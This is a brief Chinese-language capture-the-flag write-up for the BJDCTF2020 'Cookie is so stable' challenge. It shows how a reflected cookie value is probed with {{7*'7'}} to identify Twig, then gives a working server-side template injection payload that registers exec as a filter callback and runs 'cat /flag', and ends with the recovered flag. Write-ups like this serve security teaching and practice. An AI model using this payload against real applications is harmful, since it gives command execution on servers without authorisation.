https://github.com/BjdsecCA/BJDCTF2020
打开网页,在hint里获得提示让观察cookie
在flag里面的输入框输入"aa",在cookie里发现了user变为"aa"
输入框中输入"{{7*‘7‘}}",返回49,说明是Twig
于是在user里输入"{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}"得到flag:
flag{48315c84-e112-4ed3-beb9-96a97194a396}
[BJDCTF2020]Cookie is so stable
原文:https://www.cnblogs.com/hktk1643/p/14111783.html